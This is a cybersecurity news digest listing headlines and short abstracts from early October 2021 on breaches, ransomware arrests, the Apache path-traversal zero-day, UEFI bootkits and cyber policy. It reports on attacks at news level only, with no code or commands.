The Senate Homeland Security and Governmental Affairs Committee on Wednesday approved legislation to require many companies to report both major cybersecurity breaches and payments made related to ransomware attacks.The Hill
October 06, 2021 – Solution
Google to turn on 2-factor authentication by default for 150 million users Full Text
Abstract
Google has announced plans to automatically enroll about 150 million users into its two-factor authentication scheme by the end of the year as part of its ongoing efforts to prevent unauthorized access to accounts and improve security. In addition, the internet giant said it also intends to require 2 million YouTube creators to switch on the setting, which it calls two-step verification (2SV), to protect their channels from potential takeover attacks. "2SV is strongest when it combines both 'something you know' (like a password) and 'something you have' (like your phone or a security key)," Google's AbdelKarim Mardini and Guemmy Kim said in a post, adding "having a second form of authentication dramatically decreases an attacker's chance of gaining access to an account." The rollout follows the company's proposals to beef up account sign-ins earlier this May, when it said it intends to "automatically enrolling users in 2SV iThe Hacker News
October 6, 2021 – Breach
Twitch source code and sensitive data leaked online Full Text
Abstract
An anonymous individual has leaked the source code and data of the popular video streaming platform Twitch via a torrent file posted on 4chan. An anonymous individual has leaked online the source code and streamers and users data of the popular video...Security Affairs
October 06, 2021 – Vulnerabilities
Actively exploited Apache 0-day also allows remote code execution Full Text
Abstract
Proof-of-Concept (PoC) exploits for the Apache web server zero-day surfaced on the internet revealing that the vulnerability is far more critical than originally disclosed. These exploits show that the scope of the vulnerability transcends path traversal, allowing attackers remote code execution (RCE) abilities.BleepingComputer
October 6, 2021 – General
What’s in a Threat Group Name? An Inside Look at the Intricacies of Nation-State Attribution Full Text
Abstract
Different researchers may see similar activity clusters at the same time, but because of their limited visibility, may be unaware that other researchers are going through the same process.Security Week
October 06, 2021 – Attack
Twitch hack allegedly includes source code and earnings for streamers Full Text
Abstract
Online video game streaming service Twitch suffered a hack on Wednesday that leaked sources codes, user payouts and earnings for streamers, The Wall Street Journal reported.The Hill
October 06, 2021 – Vulnerabilities
Multiple Critical Flaws Discovered in Honeywell Experion PKS and ACE Controllers Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday released an advisory regarding multiple security vulnerabilities affecting all versions of Honeywell Experion Process Knowledge System C200, C200E, C300, and ACE controllers that could be exploited to achieve remote code execution and denial-of-service (DoS) conditions. "A Control Component Library (CCL) may be modified by a bad actor and loaded to a controller such that malicious code is executed by the controller," Honeywell noted in an independent security notification published earlier this February. Credited with discovering and reporting the flaws are Rei Henigman and Nadav Erez of industrial cybersecurity firm Claroty. Experion Process Knowledge System (PKS) is a distributed control system ( DCS ) that's designed to control large industrial processes spanning a variety of sectors ranging from petrochemical refineries to nuclear power plants where high reliability and security is impThe Hacker News
October 6, 2021 – Government
Arizona governor announces the launch of Command Center to protect state computer systems Full Text
Abstract
The governor of Arizona, Doug Ducey, has announced the launch of a Cyber Command Center to address the thousands of attacks that daily target government computers. The governor of Arizona, Doug Ducey, has launched a Cyber Command Center to repel the huge...Security Affairs
October 06, 2021 – Vulnerabilities
Medtronic urgently recalls insulin pump controllers over hacking concerns Full Text
Abstract
Medtronic is urgently recalling remote controllers for insulin pumps belonging to its 'MiniMed Paradigm' family of products, due to potential cybersecurity risks.BleepingComputer
October 6, 2021 – General
One in three IT security managers don’t have a formal cybersecurity incident response plan Full Text
Abstract
Regardless of industry, information security incidents have become more of a targeted threat for businesses, increasing in amount and efficacy, according to the 2021 Data Security Report from GetApp.Help Net Security
October 06, 2021 – Policy and Law
TSA to issue regulations to secure rail, aviation groups against cyber threats Full Text
Abstract
The Transportation Security Administration (TSA) will soon issue regulations to further secure rail transit and airline companies against cyber threats, Homeland Security Secretary Alejandro Mayorkas announced Wednesday.The Hill
October 6, 2021 – Breach
UK newspaper The Telegraph exposed a 10TB database with subscriber data Full Text
Abstract
The UK media outlet The Telegraph has leaked 10 TB of subscriber data after failing to properly secure one of its databases. The UK newspaper The Telegraph’, one of the UK’s largest newspapers and online media outlets, has leaked 10 TB of data...Security Affairs
October 06, 2021 – Breach
Massive Twitch hack: Source code and payment reports leaked Full Text
Abstract
Twitch source code, as well as streamers' and users' sensitive information, was allegedly leaked online by an anonymous user on the 4chan imageboard.BleepingComputer
October 6, 2021 – Breach
US Clothing Brand Next Level Apparel Reports Phishing-related Data Breach Full Text
Abstract
Next Level Apparel, a wholesale producer and online retailer of blank apparel, said it “could not confirm that any individual's information was in fact viewed by an unauthorized person”.The Daily Swig
October 06, 2021 – Government
DOJ to go after government contractors that fail to report breaches Full Text
Abstract
The Department of Justice (DOJ) said Wednesday it will go after federal contractors that fail to report cybersecurity incidents to the U.S. government.The Hill
October 6, 2021 – Attack
LANtenna attack allows exfiltrating data from Air-Gapped systems via Ethernet cables Full Text
Abstract
Boffins devised a new technique, dubbed LANtenna, to exfiltrate data from systems in air-gapped networks using Ethernet cables as a "transmitting antenna." Security researchers from the Cyber Security Research Center in the Ben Gurion University...Security Affairs
October 06, 2021 – Solution
Microsoft shares Windows 11 TPM check bypass for unsupported PCs Full Text
Abstract
Microsoft has published a new support webpage where they provide an official method to bypass the TPM 2.0 and CPU checks (TPM 1.2 is still required) and have Windows 11 installed on unsupported systems.BleepingComputer
October 6, 2021 – Malware
Mana Tools: A Malware C2 Panel with a Past Full Text
Abstract
Mana Tools was first reported in 2019 by Yoroi researchers who identified it as a fork of the AzoRult 3.2 malware created by a Pakistani actor named Aqib Waseem, better known as Hagga.Risk IQ
October 06, 2021 – Solution
Firefox improves advertising tracker blocking in private browsing Full Text
Abstract
Mozilla says that Firefox users will be better protected from advertising trackers (like Google Analytics scripts) while browsing the Internet in Private Browsing mode and using Strict Tracking Protection.BleepingComputer
October 6, 2021 – Government
FDA: How to Inform Patients About Medical Device Cyber Flaws Full Text
Abstract
These devices range from Software as a Medical Device, such as certain mobile phone applications, to implantable medical devices, such as pacemakers, the federal agency notes.Gov Info Security
October 06, 2021 – Policy and Law
Ransom Disclosure Act would give victims 48 hours to report payments Full Text
Abstract
Victims of ransomware attacks in the United States may soon have to report any payments to hackers within 48 hours, as required by a new legislation proposal titled the 'Ransom Disclosure Act'.BleepingComputer
October 6, 2021 – General
ATO attacks increased 307% between 2019 and 2021 Full Text
Abstract
A new report released by Sift revealed a staggering 307% increase in ATO attacks between April 2019—shortly after many COVID-19 stay-at-home orders were enacted—and June 2021.Help Net Security
October 06, 2021 – Attack
Fired IT admin revenge-hacks school by wiping data, changing passwords Full Text
Abstract
A 29-year old wiped data on systems of a secondary school in the U.K. and changed the passwords at an IT company, in retaliatory cyber attacks for being fired.BleepingComputer
October 6, 2021 – Phishing
Chase Bank Heavily Targeted Via XBALTI Phishing Kit Full Text
Abstract
During the three months from mid-May to mid-August 2021, Cyren researchers detected a 300% increase in phishing URLs and kits within their own telemetry targeting Chase Bank.Security Week
October 5, 2021 – Vulnerabilities
IP Surveillance Bugs in Axis Gear Allow RCE, Data Theft Full Text
Abstract
Three security vulnerabilities in Axis video products could open up the door to a bevy of different cyberattacks on businesses.Threatpost
October 5, 2021 – Vulnerabilities
Apache Web Server Zero-Day Exposes Sensitive Data Full Text
Abstract
The open-source project has rolled out a security fix for CVE-2021-41773, for which public cyberattack exploit code is circulating.Threatpost
October 5, 2021 – Outage
Facebook Blames Outage on Faulty Router Configuration Full Text
Abstract
One easily disproved conspiracy theory linked the ~six-hour outage to a supposed data breach tied to a Sept. 22 hacker forum ad for 1.5B Facebook user records.Threatpost
October 5, 2021 – Cryptocurrency
Oops! Compound DeFi Platform Gives Out $90M, Would Like it Back, Please Full Text
Abstract
The Compound cryptocurrency exchange accidentally botched a platform upgrade and distributed millions in free COMP tokens to users – then threatened to dox the recipients.Threatpost
October 05, 2021 – Business
Google to auto-enroll 150 million user accounts into 2FA Full Text
Abstract
Google announced today that they plan on auto-enrolling 150 million accounts into two-factor authentication by the end of 2021.BleepingComputer
October 5, 2021 – Malware
FinFisher is One of the Stealthiest Malware: Kaspersky Full Text
Abstract
Kaspersky laid bare a n eight-month-long investigation into FinSpy operations, revealing multiple insights about the new upgrades in the spyware. Using bootkits, attackers are able to control operating systems' boot process and disable the defenses by evading the Secure Boot mechanism of the sys ... Read MoreCyware Alerts - Hacker News
October 05, 2021 – Government
NSA director expects to be facing ransomware attacks ‘every single day’ in five years Full Text
Abstract
National Security Agency (NSA) Director Paul Nakasone predicted Tuesday that the rate of ransomware attacks will not slow down in the next five years, and said efforts to counter those threats must remain constant as well.The Hill
October 05, 2021 – Malware
Researchers Discover UEFI Bootkit Targeting Windows Computers Since 2012 Full Text
Abstract
Cybersecurity researchers on Tuesday revealed details of a previously undocumented UEFI (Unified Extensible Firmware Interface) bootkit that has been put to use by threat actors to backdoor Windows systems as early as 2012 by modifying a legitimate Windows Boot Manager binary to achieve persistence, once again demonstrating how technology meant to secure the environment prior to loading the operating system is increasingly becoming a "tempting target." Slovak cybersecurity firm ESET codenamed the new malware "ESPecter" for its ability to persist on the EFI System Partition ( ESP ), in addition to circumventing Microsoft Windows Driver Signature Enforcement to load its own unsigned driver that can be used to facilitate espionage activities such as document theft, keylogging, and screen monitoring by periodically capturing screenshots. "ESPecter shows that threat actors are relying not only on UEFI firmware implants when it comes to pre-OS persistence and,The Hacker News
October 5, 2021 – Vulnerabilities
Apache patch a zero-day flaw exploited in the wild Full Text
Abstract
Apache has addressed two vulnerabilities, one of which is a path traversal and file disclosure flaw in its HTTP server actively exploited in the wild. Apache has rolled out security patches to address two flaws, including a path traversal and file...Security Affairs
October 5, 2021 – Education
How to Build an Incident-Response Plan, Before Security Disaster Strikes Full Text
Abstract
Joseph Carson, Chief Security Scientist at ThycoticCentrify, offers a 7-step practical IR checklist for ensuring a swift recovery from a cyberattack.Threatpost
October 05, 2021 – Breach
The Telegraph exposes 10 TB database with subscriber info Full Text
Abstract
'The Telegraph', one of UK's largest newspapers and online media outlets, has leaked 10 TB of data after failing to properly secure one of its databases.BleepingComputer
October 5, 2021 – Malware
Analyzing LockBit’s Data Exfiltration Model Full Text
Abstract
Yoroi Malware ZLAB analyzed the new working model of LockBit 2.0 that has recently developed its custom tool specialized in data exfiltration. The RaaS group has been helping its partners by providing StealBit data exfiltration service. With the proliferation of such tools, protecting sensitiv ... Read MoreCyware Alerts - Hacker News
October 05, 2021 – Government
Lawmakers introduce bill to identify and protect critical groups from cyber threats Full Text
Abstract
House Homeland Security Committee ranking member John Katko (R-N.Y.) and Rep. Abigail SpanbergerAbigail Davis SpanbergerBiden to host lawmakers at White House next week amid impasse on his agenda Progressives cheer, moderates groan as Biden visit caps chaotic week Katie Hill launches effort to protect Democratic majority in House MORE (D-Va.) on Tuesday introduced legislation to help the federal government identify and further protect certain critical groups from cyberattacks.The Hill
October 05, 2021 – Vulnerabilities
Apache Warns of Zero-Day Exploit in the Wild — Patch Your Web Servers Now! Full Text
Abstract
Apache has issued patches to address two security vulnerabilities, including a path traversal and file disclosure flaw in its HTTP server that it said is being actively exploited in the wild. "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root," the open-source project maintainers noted in an advisory published Tuesday. "If files outside of the document root are not protected by 'require all denied' these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts." The flaw, tracked as CVE-2021-41773 , affects only Apache HTTP server version 2.4.49. Ash Daulton and cPanel Security Team have been credited with discovering and reporting the issue on September 29, 2021. Source: PT SWARM Also resolved by Apache is a null pointer dereference vulnerability observed during prThe Hacker News
October 5, 2021 – Criminals
Unnamed Ransomware gang uses a Python script to encrypt VMware ESXi servers Full Text
Abstract
An unnamed ransomware gang used a custom Python script to target VMware ESXi and encrypt all the virtual machines hosted on the server. Researchers from Sophos were investigating a ransomware attack when discovered that the attackers employed a Python...Security Affairs
October 05, 2021 – Vulnerabilities
Apache fixes actively exploited zero-day vulnerability, patch now Full Text
Abstract
The Apache Software Foundation has released version 2.4.50 of the HTTP Web Server to address two vulnerabilities, one of which is an actively exploited path traversal and file disclosure flaw.BleepingComputer
October 5, 2021 – Breach
Misconfigured, Old Apache Airflow Instances Leak Slack, AWS Credentials Full Text
Abstract
On Monday, Intezer researchers said the instances, vulnerable to data theft, belong to industries including IT, cybersecurity, health, energy, finance, and manufacturing, among other sectors.ZDNet
October 05, 2021 – Hacker
New Study Links Seemingly Disparate Malware Attacks to Chinese Hackers Full Text
Abstract
Chinese cyber espionage group APT41 has been linked to seemingly disparate malware campaigns, according to fresh research that has mapped together additional parts of the group's network infrastructure to hit upon a state-sponsored campaign that takes advantage of COVID-themed phishing lures to target victims in India. "The image we uncovered was that of a state-sponsored campaign that plays on people's hopes for a swift end to the pandemic as a lure to entrap its victims," the BlackBerry Research and Intelligence team said in a report shared with The Hacker News. "And once on a user's machine, the threat blends into the digital woodwork by using its own customized profile to hide its network traffic." APT41 (aka Barium or Winnti) is a moniker assigned to a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in conjunction with financially motivated operations for personal gain as far back as 2012. Calling the groThe Hacker News
October 5, 2021 – Breach
Telco service provider giant Syniverse had unauthorized access since 2016 Full Text
Abstract
Syniverse service provider discloses a security breach, threat actors have had access to its databases since 2016 and gained some customers' credentials. Syniverse is a global company that provides technology and business services for a number of telecommunications...Security Affairs
October 05, 2021 – Criminals
Ransomware gang encrypts VMware ESXi servers with Python script Full Text
Abstract
Operators of an unknown ransomware gang are using a Python script to encrypt virtual machines hosted on VMware ESXi servers.BleepingComputer
October 5, 2021 – Ransomware
New Ransomware Aims at Virtual Machines, ESXi Hypervisors to Encrypt Disks Full Text
Abstract
The attack, one of the fastest recorded by Sophos researchers, was achieved by operators who "precision-targeted the ESXi platform" in order to encrypt the virtual machines of the victim.ZDNet
October 05, 2021 – Criminals
Ransomware Hackers Who Attacked Over 100 Companies Arrested in Ukraine Full Text
Abstract
Law enforcement agencies have announced the arrest of two "prolific ransomware operators" in Ukraine who allegedly conducted a string of targeted attacks against large industrial entities in Europe and North America since at least April 2020, marking the latest step in combating ransomware incidents. The joint exercise was undertaken on September 28 by officials from the French National Gendarmerie, the Ukrainian National Police, and the U.S. Federal Bureau of Investigation (FBI), alongside participation from the Europol's European Cybercrime Centre and the INTERPOL's Cyber Fusion Centre. "The criminals would deploy malware and steal sensitive data from these companies, before encrypting their files," Europol said in a press statement on Monday. "They would then proceed to offer a decryption key in return for a ransom payment of several millions of euros, threatening to leak the stolen data on the dark web should their demands not be met." BThe Hacker News
October 5, 2021 – Hacker
Dark web marketplace White House announces end to its operations Full Text
Abstract
The dark web marketplace White House Market shuts down its operation, last week its operators announced that they were retiring. The dark web marketplace White House Market shuts down its operation, the announcement was published on a dread forum....Security Affairs
October 05, 2021 – Vulnerabilities
Android October patch fixes three critical bugs, 41 flaws in total Full Text
Abstract
Google has released the Android October security updates, addressing 41 vulnerabilities, all ranging between high and critical severity.BleepingComputer
October 5, 2021 – Business
Temasek leads $550M Series C extension into Orca Security, which aims for further international foothold Full Text
Abstract
Orca Security, an Israeli security company offering an agent-less platform for protecting cloud-based assets, secured a $550 million extension to the Series C funding round it raised seven months ago.TechCrunch
October 5, 2021 – Vulnerabilities
Misconfigured Apache Airflow servers leak thousands of credentials Full Text
Abstract
Experts discovered many misconfigured Apache Airflow servers exposed online that were leaking sensitive information from prominent tech firms. Apache Airflow is an open-source workflow management platform used by many organizations worldwide for automating...Security Affairs
October 05, 2021 – Malware
New UEFI bootkit used to backdoor Windows devices since 2012 Full Text
Abstract
A newly discovered and previously undocumented UEFI (Unified Extensible Firmware Interface) bootkit has been used by attackers to backdoor Windows systems by hijacking the Windows Boot Manager since at least 2012.BleepingComputer
October 5, 2021 – Breach
OnionShare: Secure communications platform used by whistleblowers and journalists patches data exposure bug Full Text
Abstract
A tool used by whisteblowers and the media to securely send information has patched two vulnerabilities that could have impacted the anonymous nature of the file-sharing system.The Daily Swig
October 4, 2021 – Outage
Facebook Outage Drags Down Instagram, WhatsApp, Messenger, Oculus VR Full Text
Abstract
They were all flat on their faces for hours on Monday, throwing off DNS error messages or other server-related errors.Threatpost
October 4, 2021 – Malware
Encrypted & Fileless Malware Sees Big Growth Full Text
Abstract
An analysis of second-quarter malware trends shows that threats are becoming stealthier.Threatpost
October 4, 2021 – Criminals
Transnational Fraud Ring Bilks U.S. Military Service Members Out of Millions Full Text
Abstract
A former medical records tech stole PII that was then used to fraudulently claim DoD and VA benefits, particularly targeting disabled veterans.Threatpost
October 04, 2021 – Breach
Largest mobile SMS routing firm discloses five-year-long breach Full Text
Abstract
Syniverse, a service provider for most telecommunications companies, disclosed that hackers had access to its databases over the past five years and compromised login credentials belonging to hundreds of customers.BleepingComputer
October 4, 2021 – Outage
Sandhill Shut Down by Conti Ransomware Attack Full Text
Abstract
The publication giant, Sandhill, suffered a ransomware attack that unfortunately caused hosted websites to become inaccessible, in this way disrupting their business operations.Heimdal Security
October 04, 2021 – Criminals
International coalition arrests ‘prolific’ hackers involved in ransomware attacks Full Text
Abstract
An international coalition of American, French, Ukrainian and European Union (EU) law enforcement authorities coordinated on the arrest last week of two individuals and the seizure of millions of dollars in profit allegedly involved with a spree of damaging ransomware attacks.The Hill
October 04, 2021 – Vulnerabilities
Creating Wireless Signals with Ethernet Cable to Steal Data from Air-Gapped Systems Full Text
Abstract
A newly discovered data exfiltration mechanism employs Ethernet cables as a "transmitting antenna" to stealthily siphon highly-sensitive data from air-gapped systems, according to the latest research. "It's interesting that the wires that came to protect the air-gap become the vulnerability of the air gap in this attack," Dr. Mordechai Guri, the head of R&D in the Cyber Security Research Center in the Ben Gurion University of the Negev in Israel, told The Hacker News. Dubbed " LANtenna Attack ," the novel technique enables malicious code in air-gapped computers to amass sensitive data and then encode it over radio waves emanating from Ethernet cables just as if they are antennas. The transmitted signals can then be intercepted by a nearby software-defined radio (SDR) receiver wirelessly, decode the data, and send it to an attacker who is in an adjacent room. "Notably, the malicious code can run in an ordinary user-mode process and successfThe Hacker News
October 4, 2021 – Outage
Facebook, WhatsApp, and Instagram are down worldwide, it’s panic online Full Text
Abstract
Users worldwide are experiencing problems while accessing Facebook services, including Instagram and WhatsApp. Users worldwide are not able to access Facebook, Instagram, and WhatsApp services due to a BGP problems. Users attempting to visit the above...Security Affairs
October 04, 2021 – Hacker
RaidForums forced to use mirror after Brazilian govt contacts registrar Full Text
Abstract
The RaidForums hacking forum has gone through a turbulent week, with its website now forced through a mirror domain after a government filed a legal request with their registrar.BleepingComputer
October 4, 2021 – Vulnerabilities
PoC Exploit Released for macOS Gatekeeper Bypass Full Text
Abstract
Rasmus Sten, a software engineer with cybersecurity firm F-Secure, has released proof-of-concept (PoC) exploit code for a macOS Gatekeeper bypass that Apple patched in April this year.Security Week
October 04, 2021 – Government
Senators warn of Chinese technology threats ahead of international meeting Full Text
Abstract
The leaders of the Senate Intelligence Committee on Monday warned of continuing threats posed by the Chinese government to telecommunications systems and other critical technologies ahead of a major international summit.The Hill
October 04, 2021 – Vulnerabilities
Poorly Configured Apache Airflow Instances Leak Credentials for Popular Services Full Text
Abstract
Cybersecurity researchers on Monday discovered misconfigurations across older versions of Apache Airflow instances belonging to a number of high-profile companies across various sectors, resulting in the exposure of sensitive credentials for popular platforms and services such as Amazon Web Services (AWS), Binance, Google Cloud Platform (GCP), PayPal, Slack, and Stripe. "These unsecured instances expose sensitive information of companies across the media, finance, manufacturing, information technology (IT), biotech, e-commerce, health, energy, cybersecurity, and transportation industries," Intezer said in a report shared with The Hacker News. Originally launched in June 2015, Apache Airflow is an open-source workflow management platform that enables programmatic scheduling and monitoring of workflows on AWS, GCP, Microsoft Azure, and other third-party services. It's also one of the most popular task orchestration tools, followed by Luigi, Kubeflow, and MLflow. SoThe Hacker News
October 4, 2021 – Outage
Pottawatomie County paid the ransom to recover its systems Full Text
Abstract
Pottawatomie County restored operations that were suspended after a ransomware attack hit its systems on September 17, 2021. Officials at Pottawatomie County announced to have fully recovered their IT infrastructure that was hit by a ransomware attack...Security Affairs
October 04, 2021 – Breach
Misconfigured Apache Airflow servers leak thousands of credentials Full Text
Abstract
While investigating a misconfiguration flaw in Apache Airflow, researchers discovered many exposed instances over the web leaking sensitive information, including credentials, from well-known tech companies. Apache Airflow is a popular open-source workflow management platform for organizing and managing tasks.BleepingComputer
October 4, 2021 – Criminals
Ukrainian Police Arrest Hacker Who Caused $150 Million Damage to Global Firms Full Text
Abstract
Ukrainian police said they had arrested a 25-year-old man who hacked more than 100 foreign companies and caused damage worth more than $150 million. The hacker used phishing attacks and hijacked software that allows computers to be accessed remotely.Reuters
October 04, 2021 – Government
Senators introduce bill to strengthen federal cybersecurity after attacks Full Text
Abstract
Senate Homeland Security and Governmental Affairs Committee Chairman Gary Peters (D-Mich.) and ranking member Rob PortmanRobert (Rob) Jones PortmanThe United States must lead the way on artificial intelligence standards The most important part of the infrastructure bill is little noticed Hillicon Valley — Presented by Ericsson — Bill would give some groups 24 hours to report ransomware payments MORE (R-Ohio) introduced a bill Monday to overhaul and improve federal cybersecurity policies following multiple major cyberattacks.The Hill
October 04, 2021 – APT
A New APT Hacking Group Targeting Fuel, Energy, and Aviation Industries Full Text
Abstract
A previously undocumented threat actor has been identified as behind a string of attacks targeting fuel, energy, and aviation production industries in Russia, the U.S., India, Nepal, Taiwan, and Japan with the goal of stealing data from compromised networks. Cybersecurity company Positive Technologies dubbed the advanced persistent threat (APT) group ChamelGang — referring to their chameleellonic capabilities, including disguising "its malware and network infrastructure under legitimate services of Microsoft, TrendMicro, McAfee, IBM, and Google." "To achieve their goal, the attackers used a trending penetration method—supply chain," the researchers said of one of the incidents investigated by the firm. "The group compromised a subsidiary and penetrated the target company's network through it. Trusted relationship attacks are rare today due to the complexity of their execution. Using this method […], the ChamelGang group was able to achieve its goal aThe Hacker News
October 4, 2021 – Criminals
Two ransomware operators were arrested in Kyiv with EUROPOL’s support Full Text
Abstract
Two ransomware operators arrested in Kyiv, Ukraine, that are suspected to have attacked more than 100 companies causing more than $150M in damages. A joint international law enforcement operation led to the arrest of the ransomware operators in Kyiv,...Security Affairs
October 04, 2021 – Government
UK plans to invest £5 billion in retaliatory cyber-attacks Full Text
Abstract
The United Kingdom has revealed plans to invest £5 billion in bolstering national cybersecurity that includes creating a "Cyber Force" unit to perform retaliatory attacks.BleepingComputer
October 4, 2021 – Policy and Law
Fraudster jailed for stealing US military health records, millions in benefits Full Text
Abstract
Between July 2014 and September 2015, the 40-year-old stole the personal identifying information (PII) of over 3,300 individuals, including "at least eight general officers, as well as numerous disabled veterans," said the DoJ.ZDNet
October 04, 2021 – Education
The Shortfalls of Mean Time Metrics in Cybersecurity Full Text
Abstract
Security teams at mid-sized organizations are constantly faced with the question of "what does success look like?". At ActZero, their continued data-driven approach to cybersecurity invites them to grapple daily with measuring, evaluating, and validating the work they do on behalf of their customers. Like most, they initially turned toward the standard metrics used in cybersecurity, built around a "Mean Time to X" (MTTX) formula, where X indicates a specific milestone in the attack lifecycle. In this formula, these milestones include factors like Detect, Alert, Respond, Recover, or even Remediate when necessary. However, as they started to operationalize their unique AI and machine-learning approach , they realized that "speed" measures weren't giving them a holistic view of the story. More importantly, simply measuring just speed wasn't as applicable in an industry where machine-driven alerts and responses were happening in fractions of seconThe Hacker News
October 4, 2021 – APT
New APT ChamelGang Targets energy and aviation companies in Russia Full Text
Abstract
ChamelGang APT is a new cyberespionage group that focuses on fuel and energy organizations and aviation industry in Russia ChamelGang is a new APT group that was first spotted in March by researchers at security firm Positive Technologies, it targets...Security Affairs
October 04, 2021 – Ransomware
New Atom Silo ransomware targets vulnerable Confluence servers Full Text
Abstract
Atom Silo, a newly spotted ransomware group, is targeting a recently patched and actively exploited Confluence Server and Data Center vulnerability to deploy their ransomware payloads.BleepingComputer
October 4, 2021 – Outage
Pottawatomie County Fixing Systems After Ransomware Attack Full Text
Abstract
The county resolved the attack by paying less than 10% of the hackers’ original demands, County Administrator Chad Kinsley said in a statement. The eastern Kansas county did not disclose the amount it paid.Security Week
October 4, 2021 – Attack
LockBit 2.0 ransomware hit Israeli defense firm E.M.I.T. Aviation Consulting Full Text
Abstract
Israeli Aerospace & Defense firm E.M.I.T. Aviation Consulting Ltd. was hit by LockBit 2.0 ransomware, operators will leak files on 07 Oct, 2021. LockBit 2.0 ransomware operators hit the Israeli aerospace and defense firm E.M.I.T. Aviation Consulting...Security Affairs
October 04, 2021 – Criminals
Ransomware operators behind hundreds of attacks arrested in Ukraine Full Text
Abstract
Europol has announced the arrest of two men in Ukraine, said to be members of a prolific ransomware operation that extorted victims with ransom demands ranging between €5 to €70 million.BleepingComputer
October 4, 2021 – Malware
TA544 group behind a spike in Ursnif malware campaigns targeting Italy Full Text
Abstract
Proofpoint researchers have discovered a new Ursnif baking Trojan campaign carried out by a group tracked as TA544 that is targeting organizations in Italy. The experts observed nearly 20 notable campaigns.Security Affairs
October 03, 2021 – Criminals
Transnational fraud ring stole millions from Army members, veterans Full Text
Abstract
Fredrick Brown, a former U.S. Army contrractor, was sentenced today to 151 months in prison after admitting to his role in a conspiracy that targeted thousands of U.S. servicemembers and veterans and caused millions of dollars in losses.BleepingComputer
October 3, 2021 – Criminals
TA544 group behind a spike in Ursnif malware campaigns targeting Italy Full Text
Abstract
Proofpoint researchers reported that TA544 threat actors are behind a new Ursnif campaign that is targeting Italian organizations. Proofpoint researchers have discovered a new Ursnif baking Trojan campaign carried out by a group tracked as TA544...Security Affairs
October 3, 2021 – Vulnerabilities
CVE-2021-38647 OMIGOD flaw impacts IBM QRadar Azure Full Text
Abstract
Experts warn that CVE-2021-38647 OMIGOD flaws affect IBM QRadar Azure and can be exploited by remote attackers to execute arbitrary code. The Open Management Infrastructure RPM package in the IBM QRadar Azure marketplace images is affected by a remote...Security Affairs
October 3, 2021 – General
Security Affairs newsletter Round 334 Full Text
Abstract
A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the international press subscribe here. Threat...Security Affairs
October 3, 2021 – Government
The Biden administration will work with 30 countries to curb global cybercrime Full Text
Abstract
The Biden administration announced it will work with 30 countries, including NATO allies and G7 partners, to curb global cybercrime. U.S. President Joe Biden announced that the US will work with 30 countries to curb cybercrime and dismantle ransomware...Security Affairs
October 02, 2021 – General
False election claims undermine efforts to increase security Full Text
Abstract
Officials say the biggest threat facing U.S. elections isn't Russian hacking or domestic voter fraud but disinformation and misinformation increasingly undermining the public’s perception of voting security.The Hill
October 02, 2021 – Outage
Sandhills online machinery markets shut down by ransomware attack Full Text
Abstract
Industry publication giant Sandhills Global has suffered a ransomware attack, causing hosted websites to become inaccessible and disrupting their business operations.BleepingComputer
October 2, 2021 – Cryptocurrency
Threat actors exploit a flaw in Coinbase 2FA to steal user funds Full Text
Abstract
Threat actors stole funds from the accounts of more than 6,000 users of the crypto exchange Coinbase exploiting a flaw to bypass 2FA authentication. Threat actors have exploited a vulnerability in the SMS-based two-factor authentication (2FA) system...Security Affairs
October 2, 2021 – Breach
Mozilla: Superman, Batman, Spider-Man dominate list of passwords leaked in breaches Full Text
Abstract
Superhero-based passwords are increasingly showing up in datasets of breached information, according to a new blog post from Mozilla. Mozilla used data from haveibeenpwned.com to figure out the most common passwords found in breached datasets.ZDNet
October 2, 2021 – Malware
Flubot Android banking Trojan spreads via fake security updates Full Text
Abstract
The Flubot Android malware is now leveraging fake security updates warning to trick users into installing the malicious code. Threat actors behind the Flubot Android malware are now leveraging fake security updates to trick victims into installing...Security Affairs
October 2, 2021 – Malware
Password-stealing Android malware uses sneaky security warning to trick you into downloading Full Text
Abstract
FluBot attacks have commonly come in the form of text messages which claim the recipient has missed a delivery, asking them to click a link to install an app to organize a redelivery. This app installs the malware.ZDNet
October 2, 2021 – Vulnerabilities
Tim’s RED Team Research reports 3 new CVEs, two of which in 4G/5G Full Text
Abstract
Telecom Italia Red Team Research (RTR) laboratory led by Massimiliano Brolli reported three new flaws in Oracle GlassFish and Nokia NetAct. Telecom Italia Red Team Research (RTR) laboratory led by Massimiliano Brolli, reported three new vulnerabilities...Security Affairs
October 2, 2021 – Cryptocurrency
Coinbase says hackers stole cryptocurrency from at least 6,000 customers Full Text
Abstract
Hackers stole from the accounts of at least 6,000 customers of Coinbase Global Inc, according to a breach notification letter sent by the cryptocurrency exchange to affected customers.Reuters
October 2, 2021 – Government
White House to convene 30-country cybersecurity meeting Full Text
Abstract
The topics of the meeting, President Biden said, will include combating cybercrime, improving law enforcement collaboration, stemming the illicit use of cryptocurrency, building trusted 5G technology and better securing supply chains.ZDNet
October 01, 2021 – Ransomware
The Week in Ransomware - October 1st 2021 - “This was preventable” Full Text
Abstract
This week comes with reports of a hospital ransomware attack that led to the death of a baby and new efforts by governments worldwide to combat ransomware.BleepingComputer
October 01, 2021 – Government
Biden ‘confident’ in the nation’s cybersecurity efforts as Cybersecurity Awareness Month begins Full Text
Abstract
President Biden on Friday expressed confidence in measures taken by his administration during his first months in office to secure the nation against mounting cyber threats as Cybersecurity Awareness Month kicks off.The Hill
October 01, 2021 – Vulnerabilities
Apple Pay Can be Abused to Make Contactless Payments From Locked iPhones Full Text
Abstract
Cybersecurity researchers have disclosed an unpatched flaw in Apple Pay that attackers could abuse to make an unauthorized Visa payment with a locked iPhone by taking advantage of the Express Travel mode set up in the device's wallet. "An attacker only needs a stolen, powered on iPhone. The transactions could also be relayed from an iPhone inside someone's bag, without their knowledge," a group of academics from the University of Birmingham and University of Surrey said . "The attacker needs no assistance from the merchant and backend fraud detection checks have not stopped any of our test payments." Express Travel is a feature that allows users of iPhone and Apple Watch to make quick contactless payments for public transit without having to wake or unlock the device, open an app, or even validate with Face ID, Touch ID or a passcode. The man-in-the-middle ( MitM ) replay and relay attack , which involves bypassing the lock screen to make a payment tThe Hacker News
October 1, 2021 – Education
The Cyber Monoculture Risk Full Text
Abstract
Monoculture risk is manageable for most systems, but that isn’t the case for government systems. For these systems, monoculture vulnerability is a national security risk.Lawfare
October 1, 2021 – Breach
